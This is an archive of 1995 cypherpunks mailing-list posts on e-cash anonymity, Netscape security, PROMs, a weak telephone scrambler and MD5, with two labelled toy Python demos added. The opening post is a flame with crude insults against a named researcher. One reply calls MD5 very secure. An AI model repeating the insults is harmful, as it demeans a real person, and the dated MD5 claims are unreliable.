kept the attributions straight.  I've tried to add attributions where
missing based on the "In-Reply-To:" headers.  If I screwed anything
up - sorry, I tried...

	It is long and contains history from another mailing list haunt.

	**************************************************
	* WARNING - Category 5 Ad Hominem Attack on Full *
	*	Afterburners dead ahead!		 *
	*						 *
	*	Hit delete NOW if not interested!	 *
	*						 *
	*	You have been warned!		 	 *
	**************************************************

	<FLAME><STRONG><FIRE IN DA HOLE!>

	To quote a line from one of the "Nightmare on Elm Street" slasher
flicks - "Freddie's Back!"

	There are several individuals on this list that I believe I
recognize from the firewalls list.  Those individuals are most likely
already familiar with most of what I'm about to relate.  Forgive me
for dredging up old news in a new forum.

	"Dr." Frederick B. Cohen was a frequent contributor to the
firewalls mailing list.  Many of his contributions were ill researched
and he often took great offense when anyone questioned one of his postings.
Out of the thousands of contributors I've read from literally dozens and
dozens of high volume lists I subscribe to, this is the only character I
know who puts a "Dr" in his address.  There are degrees floating all over
the place out here (even got a couple myself - so what?).  He appears
to be the only one who seems to need this anointed authority to
back his words.  He may not realize that to some of us, waving a
degree around like that, is a red letter warning to check everything
he's preaching and that he's probably more full of shit than a
Christmas goose (his words tend to confirm that impression).

	He got into several disputes with some of the other lurkers
on the firewalls list, including the moderator, Brent Chapman.  Several
of us got into debates, some on line, some off line, as to whether he was:

	1) Really that ignorant and arrogant.
	2) Baiting people because that's how he got his jollies.
	3) Looking for any excuse to push his Info-Sec ad-signature.

	Many of us were of the opinion that it could have been a
combination of all three but #3 was the decided front runner.

	Whatever his degree - the phrase "educated above and beyond his
intelligence" comes to mind when I read one of his posts.  Ill informed,
opinionated, arrogant, and seemingly obsessed with his self worth are
other terms.

	He developed a reputation for pontificating about things of which
he seemed to have little knowledge but on which he seemed to consider
himself an authority.  He seemed to have little interest in researching
a topic before shooting his mouth off, and seemed to feel that his "Dr."
conveyed some sort of infallibility on his opinions, turning opinion into
fact, so to speak.  To say he was less than graceful when someone would
foolishly point out some of his errors would be putting it mildly.

	His tirades prompted one lurker on the firewalls list to add
a line to his signature that went something like this: "Fine, so
you've got a PhD, just don't touch anything!"

	In one posting he recommended "cutting the wire to the record
head" on a floppy disk drive as a way to make it write protected.  This
was rather interesting in light of the fact that disk drives use combined
read/write heads and have no separate "record head".  Must have been
thinking it was a tape recorder.  His silly idea would have made
the drive both write protected and read protected as well.

	When I quoted his article and pointed it out as a source
of misinformation, he wrote me a message off-line wanting to know
why HIS information was included in my article about misinformation.
I had quoted most of his message, including his signature, in my
posting.  The information he quoted back to me was his "Info-Sec"
signature.  It seems his little tag line advertisements were more
important to him than the BULLSH*T he was thumping on about.
(Note point #3 above).

	In my reply, I asked him if the misinformation in the body
of the message was in fact his or was someone forging messages in
his name to discredit him.  He did admit it was his.  At this point,
I will give him credit - he was very gracious in that instance,
and admitted he had made a mistake.  It was a distinct contrast,
in private E-Mail, to his tone and manner on the public mailing lists.

In <199510182319.QAA02924@netcom23.netcom.com> cjs@netcom.com wrote:
> In <9510182213.AA05709@all.net> "Dr. Frederick B. Cohen" wrote:
	(^^^^ Attribution added - mine ^^^^)
> > 50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or
> > other) browser:
> >
> > Concept 1 - Hot Java code that, once started, takes and retains
> > control of the viewer.  It includes hot buttons, etc.  that let you
> > use common resources on the net, store favorite places, etc.  When
> > you push any button in this window, it simulates Hot Java within its
> > own code, but all reads and writes contain code to restart the
> > program (such as the "remember favorite places" button, etc.).
> 
> You are obviously disillusioned/ignorant about how the java runtime
> environment works, and what is possible with its base class
> libraries. I'll bet that you have never ever read the programming
> guide or the virtual machine specs, and I encourage you to do so
> before you embarrass yourself even more.

	He doesn't seem to research his ideas before spouting them as
gospel.  Once he has reached his "conclusion" he takes it as fact
and expects us to accept it because he's a "Dr".

	I read the original "50 ways" article.  I initially took it to
be dead serious.  Until I noticed who the author was.  Then I thought
"it figures, validity = 0 -> drop in bit bucket".  I came away with the
impression that he was just spouting off, as is his way, and had not
only not tested one single idea espoused therein but really hadn't a
clue as to the validity of any of it.  I got the impression that he
expected us to accept his points on the weight of his degree alone,
since he provided no evidence, just random speculations.  I certainly
did not see any humor in the article as he later would allege.

> Christopher

> P.S. Coming Soon! 50 things that could happen to flying pigs!

	No joke.  No doubt he will claim that they should be secure pigs!

In <9510190047.AA14597@ communities.com> chip@communities.com (Chip Morningstar) wrote:
> fc@all.net (Dr. Frederick B. Cohen) writes:
> >50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:
> > ... (drivel elided)
> 
> This fellow seems to be systematically (if not deliberately) ignorant
> about these things.

	Keep that point in mind.  This may not be "accidental" ignorance here.

> One of my co-workers reviewed his book on computer viruses in IEEE
> Multimedia and noted that it manifests many of the same fallacies. You
> can read it (the review, not the book) at
> 
> http://www.communities.com/paper/itsalive.html
> 
	: Signature deleted :

	That would be very consistent with his writings on the firewalls
list.  I'll have to take a look at the review.  Should be good for a few
laughs at the very least!

In <199510190110.SAA02346@netcom23.netcom.com> cjs@netcom.com (cjs) wrote:
> fc@all.net (Dr. Frederick B. Cohen) wrote:
	(^^^^ Attribution added - mine ^^^^)
> > Boy, you people just don't appreciate anything that has a little bit of
> > humor mixed with a little bit of reality. 

	Got'm!  Now he claims it was humor.

> A little reality?? I've seen episodes of Star Trek with more reality.

	Agreed.

> Get real,

	Don't hold yer breath - that's not the gas he runs on.  :-)

> Christopher

In <199510191439.JAA05986@vespucci.iquest.com> pdlamb@iquest.com (Patrick Lamb) wrote:
> fc@all.net (Dr. Frederick B. Cohen) wrote:
>>> > The point I have been trying to make that many on this list seem to ignore
>>> > again and again, is that Netscape makes the security claims.  If you don't
>>> > provide effective protection, don't make the claim.  If you want to make
>>> > the claim back it up with something other than media hype.
>>> 
>>>   We are working on clarifying our security claims.  Here is an
>>> example from the San Jose Mercury news on Aug. 17, 1995:
>>> 
>>>     "We have said for a long time that given the right amount of
>>>     computer power, that a 40-bit key encrypted message could be
>>>     decrypted," said Mike Homer, Netscape's vice president of marketing. 
>>
>> "We" - I take it you are now speaking officially for Netscape?  So how come
>> Netscape doesn't even know how about Integrity shells and yet claims to
>> be able to design secure systems for money transfers?
>
><flame=on>
>
>Give it a rest, Doc.  You give all the rest of us Ph.D.'s a bad rep with
>this crap.  Of course, if you went to that 4-year vocational school to get
>an M.D., I guess that's understandable.

	Look beyond his statements.  The more this continues the more
excuse he has to post follow-ups, no matter how trivial.  Maybe his
motive is not to just drive home a point or rattle cages.

	But you are right - by waving his degree around like he does
he's confirming all the stereotypes of "college" people who haven't
got a clue or any connection with reality.  That makes ALL of us look
real bad and probably contributes to why some of us no longer think
that a degree is all that very important any longer.

>If you are so illiterate that you can't read the ascription (it says right
>up there, "said Mike Homer, Netscape's vice president of marketing"), then
>why do you (a) waste bandwidth and our time to go through this drivel, and
>(b) flame one Netscape employee for not knowing everything you know?  If
>there are all of 5+ refereed publications in this area, how about giving
>references?  It would take up less space than your recurring venom eruption!
>Or couldn't you understand the papers, given that you couldn't understand
>the news clip...

	He would seem to be both illiterate (educated - maybe; degreed
yes; literate - unlikely) and lacking in the ambition to research his
topics.  Maybe he's just so self assured in his infallibility that he's
just naturally a cocky bastard.

	Maybe it's a PhD in religion.  That would fit.
	(Argh - sorry - cheap shot -
		apologies to any religious folk out there)

><flame=off>

In <9510191718.AA19952@all.net> Fredrick B. Cohen
> In <Pine.SUN.3.90.951019115251.17527B-100000@dfw.net> "Aleph One" wrote:
>> 
>> I believe you have been told *SEVERAL* times you *WON'T* get an answer
>> on this list, and to contact their PR department. Why don't you do us all
>> a favor. Contact the PR department if this question really burns you so
>> much. Get an answer. And post it on the list.
>
>So the PR department defines security at Netscape?
>
>-- 
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

	This is exactly the trivia that makes so many of us believe that
he's just in it for the sheer numbers of posts he can crank out with his
Info-Sec ad-signature.  This shot carried nothing new or useful and
accomplished little except furthering his efforts to always get the last
word in and get another copy of his ad-signature out in front of everyone.

	Point - This signature is much smaller than the one he was
plaguing the firewalls list with.

	This finally got so bad on the firewalls list that Brent Chapman
ended up putting ole' Freddie on notice that he was on a short leash and
no more of his nonsense would be tolerated or reposted.  Brent exercised
the patience of a glacier while many of the rest of us were sick and
tired of this character.  Brent finally acted to maintain the list
in a state where the rest of us could get something productive from it.

	As is his way in trying to get the last word in, he shot off
a snippy remark to Brent to "test" the moderator filter.  Of course
Brent let that one through to illustrate the author's pettiness,
childishness, and immaturity.  Let it not be said that Brent does not
have a sense of humor, he let Freddie hang himself right pretty.

	</FIRE IN DA HOLE!></STRONG></FLAME>

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 19 Oct 95 15:20:06 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: digital cash and identity disclosure
In-Reply-To: <acac05c4410210047467@[205.199.118.202]>
Message-ID: <199510192219.QAA29534@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 I, Bryce <bryce@colorado.edu> wrote:
> 
>  (i.e., because the payer knows the actual ID number
> of the bill, she can choose to relate it to the bank and then the bank
> can identify who turns in that bill.  Has nothing to do with
> double-spending.  If the protocol provided for re-blinding before
> depositing the bill then this would not be possible, I think, and
> would still have nothing to do with double-spending.)


 Someone claiming to be the nym calling itself tcmay@got.net (Timothy C.
 May) wrote:
>
> Oh, but it does.

<snip>

> (Note: Any schemes for "re-blinding" must still allow "uniqueness"...and
> must still point back to Alice. Else the scheme/scam above 
[double-spending -B]
> will work.
> Online clearing, in which only the _first_ to present a digital cash claim
> gets paid, does not have this problem.)


Whoops, you're sure right.  Alice will not be revealing the bill's ID,
she will be revealing her "double-spending prevention" field.  Hm.  
I suppose that her victim (the one who received the pre-spent bill and
was "out"'ed) could have turned the bill in sans double-spending
prevention field if the protocol allowed for it and if he didn't mind
the risk of letting Alice get away with a bona fide double-spend.
 
 
Of course, if the bank allows anon accounts you can launder your e-coin
through these first.  Also, suppose I start a payee-anonymity service?
(a.k.a. e-laundering service).  You send me the e-coin you received, 
I deposit it with the bank, check out a new coin, and send you the new
coin.  (Minus my percentage.)  Of course, now *I* have the ability to
sting you...


Regrettably, Tim C. May is right and current Chaumian Ecash can't do
off-line clearing without enabling stings in which payers can prove
which bank account the payee used to deposit the coin.  (Not quite the
same as proving the payee's identity, but...)  Marcel van der Peijl of
DigiCash once bragged to me in private e-mail that they could probably
do both-way anonymity in off-line clearing if they really wanted to.
Does anyone else think that this is possible?  Unlike Tim, I think
that off-line clearing capability is a big plus.


Regards,

Bryce

Announcement:  I'm not reading cpunks very much.  Cc: me if you want
to be sure I'll read your post.


signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIbKx/WZSllhfG25AQEsFAQApkyEFvVhNAdUdOMBAXkFAq1ICKtw+J4Z
8rTJmkkjc2bCdl8Rh1K7jWQESxSFIrF5bLfAyJz/K2CXhVSCOZpRASSFH7vL9HHb
7M9Gv7ZfvJ5vqEvW/PpLlDoA5xjt3Q4Q3xMW1dsqOyW928kkXzZhqqKDhGlTFNoW
+sMTuvi8X7c=
=QLx5
-----END PGP SIGNATURE-----
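
The linkage discussed in this thread, as an added example (not code from the post or from DigiCash): a toy RSA blind-signature coin in which the bank cannot match a deposit to a withdrawal, yet the payer, who knows the coin's serial number, can give it to the bank and learn which account deposited it. The bank key, the account names and the `Bank` class are constructed for illustration, and the off-line double-spending field is not modelled.

```python
import hashlib
import math
import secrets

# Toy bank RSA key, constructed for this example (two Mersenne primes).
# Far too small and too structured for real use.
P = 2**31 - 1
Q = 2**61 - 1
N = P * Q
E = 65537
PHI = (P - 1) * (Q - 1)
assert math.gcd(E, PHI) == 1
D = pow(E, -1, PHI)  # private exponent (Python 3.8+)


def coin_digest(serial: bytes) -> int:
    """Value the bank's signature covers: a hash of the coin's serial number."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class Bank:
    def __init__(self):
        self.withdrawals = []  # (account, blinded value): all the bank sees at withdrawal
        self.deposits = {}     # serial -> account that deposited it

    def sign_blinded(self, account: str, blinded: int) -> int:
        """Debit `account` and sign the blinded value without seeing the serial."""
        self.withdrawals.append((account, blinded))
        return pow(blinded, D, N)

    def deposit(self, account: str, serial: bytes, sig: int) -> str:
        if pow(sig, E, N) != coin_digest(serial):
            return "bad signature"
        if serial in self.deposits:
            return "already spent"  # online clearing: only the first deposit is paid
        self.deposits[serial] = account
        return "ok"

    def who_deposited(self, serial: bytes):
        """What the bank can answer once someone hands it a serial number."""
        return self.deposits.get(serial)


def withdraw(bank: Bank, account: str):
    """Payer side: blind the coin, have it signed, unblind the signature."""
    serial = secrets.token_bytes(16)
    m = coin_digest(serial)
    while True:
        r = secrets.randbelow(N - 2) + 2  # blinding factor, must be invertible mod N
        if math.gcd(r, N) == 1:
            break
    blinded = (m * pow(r, E, N)) % N
    signed_blinded = bank.sign_blinded(account, blinded)  # equals m^D * r mod N
    sig = (signed_blinded * pow(r, -1, N)) % N            # equals m^D mod N
    return serial, sig


def demo():
    bank = Bank()
    serial, sig = withdraw(bank, "alice")       # Alice withdraws a coin
    result = bank.deposit("bob", serial, sig)   # Bob receives and deposits it

    # Payer anonymity: nothing logged at withdrawal matches the deposited coin.
    blinded_seen = {blinded for _, blinded in bank.withdrawals}
    linkable = coin_digest(serial) in blinded_seen

    # The sting: Alice knows the serial, so she can ask which account cashed it.
    payee = bank.who_deposited(serial)

    # A second deposit of the same coin is refused.
    replay = bank.deposit("carol", serial, sig)
    return result, linkable, payee, replay


if __name__ == "__main__":
    print(demo())
```

Blinding hides the payer from the bank, but nothing hides the serial number from the payer, which is why the payee's account is exposed unless the coin is exchanged for a fresh one before deposit.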




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 13:29:01 PDT
To: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Subject: Re: REMINDER: SF Federal Building, Oct 20, 1015AM: Bernstein case
Message-ID: <199510192028.QAA05488@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:02 PM 10/19/95 -0400, Thomas Grant Edwards wrote:

>Q:  Will they allow CU-SeeMe in the courtroom?  (over Metricom radio modem?)
>
>-Thomas
>

No cameras allowed in federal courtrooms.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 19 Oct 95 13:34:27 PDT
To: hallyn@cs.hope.edu (Kenshiro)
Subject: Re: textbooks
In-Reply-To: <9510191944.AA09970@samwise.cs.hope.edu>
Message-ID: <199510192034.QAA11816@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Kenshiro writes:
> I am planning to take an independent study course in cryptography.  A
> professor here is interested in doing it with me, but neither he nor any
> other faculty members at this school is very knowledgeable about
> cryptography (hence his interest :).  I am looking for good (technical)
> books on cryptography which would work well as textbooks for undergraduate
> computer science majors with scant knowledge of number theory.

The right place to start is the new edition of Bruce Schneier's book,
Applied Cryptography, which will be coming out within a month. The old
edition will probably do until then. There are a number of other
books, but Bruce's is the One Stop Shopping center, and you can spend
years dredging up the things in the bibliography.

For flavor and motivation, you might also want to read the (unabridged
hardcover -- not paperback!) version of "The Codebreakers" by David
Kahn. I read this book as a child and I suppose it got me interested
in crypto for life -- the funny thing is, it appears that the same
experience inspired Whit Diffie to go off and co-invent Public Key
Cryptography, so it is probably a history maker. However, I'll note
that it's fluffy -- all it will do is give you a solid perspective on
how hard it is to do this stuff right and how important it is.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Thu, 19 Oct 95 16:20:17 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult [NOISE]
Message-ID: <v02130500acac6b830172@[204.131.233.7]>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein wrote:
>John Young wrote:
>>
>> Responding to msg by stripes@va.pubnix.com ("Josh M. Osborne")
>> on Sun, 15 Oct 12:0  AM
>>
>> The PR of Bugs Bounty is the aim, as the quick-market-adapter
>> Netscape Chair speechified in FR.
>>
>> Promoting the notion that hackers are earnestly attacking
>> Netscape and reporting its bugs increases its credibility to
>> the stock market porkers. Is that not why dear
>> all-too-attentive Jeff has been assigned duty on this list,
>> feeding peanuts to chimp hackers and champ newshacks?
>
>  I have not been "assigned duty" on this list.  I'm here of my
>own free will.  I want to keep up on what's going on in the
>cypherpunk world, and sometimes tap the expertise of the list.
>I'm not some corporate flack assigned here to "feed the chimps".
>My personal feelings definitely lean toward unimpeded strong
>crypto, personal privacy, freedom from govt. surveillance, etc.,
>and I was interested in this stuff at a personal level before
>joining netscape, or working on security stuff.
>
>        --Jeff

So a reviewer stepped in and accused the rock star of having "sold out"...
Does working as a programmer for a "major label" on a top-40 hit mean
you're not true to your artistic roots any more?

Or does "working within the system" permanently disqualify you from
rebel/outcast status?

OK, sorry, enough of the cliches. :-)


Richard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Thu, 19 Oct 95 14:46:41 PDT
To: cypherpunks@toad.com
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash (fwd)
Message-ID: <9510192146.AA00991@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
From die Thu Oct 19 17:44:12 1995
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash (fwd)
To: loofbour@cis.ohio-state.edu (Nathan Loofbourrow)
Date: Thu, 19 Oct 1995 17:44:12 -0400 (EDT)
From: "Dave Emery" <die@pig.die.com>
Reply-To: die@die.com
In-Reply-To: <199510191346.JAA10841@colon.cis.ohio-state.edu> from "Nathan Loofbourrow" at Oct 19, 95 09:46:23 am
X-Mailer: ELM [version 2.4 PL24alpha3]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 2547      


> 
> I seem to remember PROMs actually undergoing physical, rather than
> electrical, state changes (that were presumably nonreversible). Am I
> recalling old technology, or am I just plain mistaken?

	There are three technologies here (as I am sure you know),
masked proms programmed at birth by metalization patterns and not
subject to non-destructive change after they leave the foundry, fuse
programmable proms (which is basically a technology of the 70s to 80s)
and CMOS proms that depend on patterns of trapped charge injected into
insulating layers (crudely EPROMs and lots of cousins such as flash
EPROMs, erasable PALs and FPGAs etc).

	The old fashioned titanium fuse proms indeed did operate by
having the fuse elements literally blown open by the programming process
using higher voltages and special programming logic activated by the
higher voltages that allowed a given fuse to be addressed individually
and blown open (literally vaporized).    This process is obviously one
way (except in defective devices) and once a fuse has been blown (making
a 1 in a blank device a zero for example or enabling a circuit path in a
programmable logic device) there is nothing that can be done to reverse
the process.

	Fuse programmable parts are usually bipolar devices.  And for
the most part fuse programmable proms are small and very fast and
somewhat expensive and use lots of power.

	CMOS eprom technology (which has spread to many many kinds of
programmable logic devices as CMOS has become faster and faster due to
finer line geometries) depends on injecting pockets of charge into a
silicon glass insulating layer.  The electric field associated with
these pockets of charge acts as the gate of FETS built on top of the
insulating layer - turning on those transistors where there is charge
and leaving those off where there is not.   The classical UV erasable
version of this technology is erased by exposing the device to UV light
which renders the silicon conductive which shorts out the trapped charge
sites.  A modern variant induces a controlled avalanche breakdown
through the silicon insulator region which also shorts out the stored
charge.  The latter version is erasable without UV light by electrical
action and is the technology used in many EEPROMs and Flash EPROMs.

	Thus the modern flash EPROM technology and its cousins in
programmable logic allows many (hundreds to tens of thousands)
of erasure and reprogramming (reinjecting charge) cycles in modern
prom devices.

						Dave Emery


> 
> nathan
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 19 Oct 95 15:04:19 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: [NOISE] Re: Netscape rewards are an insult
In-Reply-To: <199510191722.KAA06757@jobe.shell.portal.com>
Message-ID: <199510192203.SAA10579@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Meta-noise, but I don't plan to lose any sleep over this....

Someone writing as Alice de 'nonymous writes:
> The Netscape Navigator client was DESIGNED to be controlled remotely from
> any machine on the Internet.  This is the "flawed algorithm".  W3 was
> meant to be hypertext ... not a gateway that permits a server to deliver
> customized byte bombs down a clearcut path by remote-control. 

Maybe I'm just too sheltered. But in a couple of years on the Net, I've only
ever seen _one person_ write "W3" as an abbreviation for World Wide Web
before now.

Alice, meet Fred. Fred, meet Alice.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 19 Oct 95 15:11:21 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510182003.QAA06276@opine.cs.umass.edu>
Message-ID: <199510192214.SAA18672@homeport.org>
MIME-Version: 1.0
Content-Type: text


Futplex wrote:

| The fundamental conflict, as I see it, is this: 
| For security reasons, we want messages to be distributed to a very wide
| audience, although those messages are only of interest to a very narrow
| audience. News admins understandably are generally inclined to accept
| bandwidth only in proportion to readership. For practical reasons, they don't
| want to carry messages to people who aren't interested in them. It's not
| easy to convince the news admins to do it anyway out of altruism.

	How about a local group, such as ucb.anonymous?  Those news
admins who wanted it could get it.  Not perfect, but reduced
polyticks, increased usability.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 19 Oct 95 16:18:43 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <9510191718.AA19952@all.net>
Message-ID: <Pine.SUN.3.90.951019181226.14603A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Hello?!@# Guess no one is home. Let's see, do I look like I work at Netscape?
Nope. I am just repeating what I heard them tell you for days now.
And my guess is no. Their PR department is just a channel to get answers.

Does the White House PR department define policy? I hope not! But they are
the ones that give the conferences and answer questions. Man, some people
have a thick skull.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Thu, 19 Oct 1995, Dr. Frederick B. Cohen wrote:

> Date: Thu, 19 Oct 1995 13:18:27 -0400 (EDT)
> From: Dr. Frederick B. Cohen <fc@all.net>
> To: Aleph One <aleph1@dfw.net>
> Cc: cypherpunks@toad.com
> Subject: Re: [NOISE] Re: Postscript in Netscape
> 
> > 
> > I believe you have been told *SEVERAL* times you *WON'T* get an answer
> > on this list, and to contact their PR department. Why don't you do us all
> > a favor. Contact the PR department if this question really burns you so
> > much. Get an answer. And post it on the list.
> 
> So the PR department defines security at Netscape?
> 
> -- 
> -> See: Info-Sec Heaven at URL http://all.net
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 19 Oct 95 16:25:55 PDT
To: anonymous-remailer@shell.portal.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510191722.KAA06757@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.90.951019182011.14603B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain




Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Thu, 19 Oct 1995 anonymous-remailer@shell.portal.com wrote:

> >   NETSCAPE CLIENT APIS (NCAPIS) 2.0

> Generally, we don't routinely trust every other computer, foreign or 
> domestic on the Internet to manipulate us by remote control.  This is
> as basic as the idea that we don't give out our PIN numbers with our 
> banking cards to anyone who asks us.  

Have you actually read the stuff? The NCAPIS is not on by default.
You *must* enable it by telling it which port to listen on.
Furthermore, Mosaic had a remote control API before Netscape did.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Patterson <lep@tanju.wsnet.com>
Date: Thu, 19 Oct 95 16:42:21 PDT
To: cypherpunks@toad.com
Subject: PGPfone and (?) boxes
Message-ID: <Pine.LNX.3.91.951019183426.1453A-100000@tanju.wsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


A couple of months ago, the release of PGPfone got the list started on 
hardware alternatives to PTN encryption... An associate of mine recently 
returned from the Consumer Electronics show in Hong Kong and brought me a 
lot of stuff including a flyer for a telephone scrambler.

From the flyer:

Secure your telephone conversations through high-tech scrambling.

Never again be concerned with eavesdroppers!

Description:

With our state of the art Telephone Scrambler you can now discuss 
confidential business and/or personal matters over the public telephone 
network without worrying about eavesdroppers. This compact and easy to 
install unit renders taps and monitors useless by way of rolling code 
encryption. Eavesdroppers will hear nothing but gibberish, ensuring 
complete privacy for all your telephone conversations. The Telephone 
Scrambler allows you to set your own unique code ensuring that only you 
and the party that you are speaking with can decode the conversation. Two 
units are required -- one for each end of the conversation.

Features:

o One-touch scrambling
o Thousands of key combinations
o "Rolling code" scrambling
o Works with Tone or Pulse
o Easy connection
o LED display
o FCC registered
o Compact and Portable

Specifications:

Power: 12 VDC
Dimensions: 5 1/2" X 3" X 1"
Weight: 6 oz
PTN Connection: USOC TJ-11C
Keys: 2^12

Company is:

P3 Personal Protection Products
405 Park Avenue
New York, NY 10022
(212) 421-4757
(212) 421-5024 Fax


Well, in itself it isn't very impressive. However, I plan on giving them 
a call tomorrow and check prices. If they aren't that bad I'll get one 
and pull it apart. Perhaps it can be at least reprogrammed for more keys 
and another encryption algo. Hell, at 2^12 keys, all it takes is a few 
seconds to find which one the conversation is using.

Alan Patterson (lep@wsnet.com)        Fngpt: 41D0F61B496FECC09FABECF686AB2A1C
WSNetwork Communications Services, Inc.         PGP Encrypted Email Preferred
Montgomery, Alabama (334) 263-5505 (800) INET-750  Public Key @ MIT keyserver
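
The keyspace arithmetic behind the closing remark above, as an added example (not from the post or the vendor): the flyer does not describe the scrambling algorithm, so a toy keystream seeded only by a 12-bit key stands in for it, and ASCII text stands in for the digitized conversation. The function names, the key value and the sample message are all constructed for illustration.

```python
import hashlib
import string

KEY_BITS = 12  # "Keys: 2^12" in the flyer's specifications


def keystream(key: int, length: int) -> bytes:
    """Toy keystream (an assumption): SHA-256 in counter mode, seeded by the key alone."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key.to_bytes(2, "big") + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def scramble(key: int, data: bytes) -> bytes:
    """XOR with the keystream; the same call descrambles."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


PRINTABLE = set(string.printable.encode())


def looks_plausible(candidate: bytes) -> bool:
    """No known plaintext needed: real traffic has structure, random bytes do not."""
    return all(b in PRINTABLE for b in candidate)


def exhaust_keyspace(ciphertext: bytes, key_bits: int = KEY_BITS):
    """Try every key; return the keys whose output passes the plausibility test."""
    return [k for k in range(2 ** key_bits) if looks_plausible(scramble(k, ciphertext))]


def average_trials(key_bits: int) -> int:
    """Expected number of keys tried before hitting the right one."""
    return 2 ** (key_bits - 1)


# Constructed sample: a short message scrambled under an arbitrary 12-bit key.
SECRET_KEY = 0xA5C
SAMPLE = b"Constructed sample: meet me at the usual place at nine."
CIPHERTEXT = scramble(SECRET_KEY, SAMPLE)

if __name__ == "__main__":
    hits = exhaust_keyspace(CIPHERTEXT)
    print("keys tried:", 2 ** KEY_BITS, "plausible keys:", [hex(k) for k in hits])
    for bits in (12, 40, 56, 128):
        print(bits, "bit key: about", average_trials(bits), "trials on average")
```

The user-settable code adds nothing once the whole keyspace fits in a loop; only a larger key changes the work an eavesdropper faces.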





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Thu, 19 Oct 95 11:25:34 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: 50 attacks... [NOISE]
In-Reply-To: <199510191427.HAA10783@jobe.shell.portal.com>
Message-ID: <9510191823.AA02208@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Someone abused "Frederick B. Cohen"'s reputation by making him write :
 > > there is no way to do this in practice because as RSA-based signatures
 > > are actually implemented only hashes are signed.  This is done exactly to
 > > prevent this and similar attacks.
 > And how secure is the hash?
By design choice, "Very secure"...("the difficulty of coming up with
any message having a given message digest is on the order of 2^128
operations", see end)
 > Is it possible to create values that will
 > hash to each prime (or something else that does the job)?
No.
 > Is the hash
 > something we can figure a way to precompute using massively parallel
 > processing so that we can then provide a set of codes which will produce
 > the desired results? (etc.)
No.

Why wouldn't you try to answer the questions yourself before mailing
random thoughts?
see RFC1321 The MD5 Message-Digest Algorithm
and numerous reviews...

Maybe I was being just "tested" and should not have replied :/

dl
--
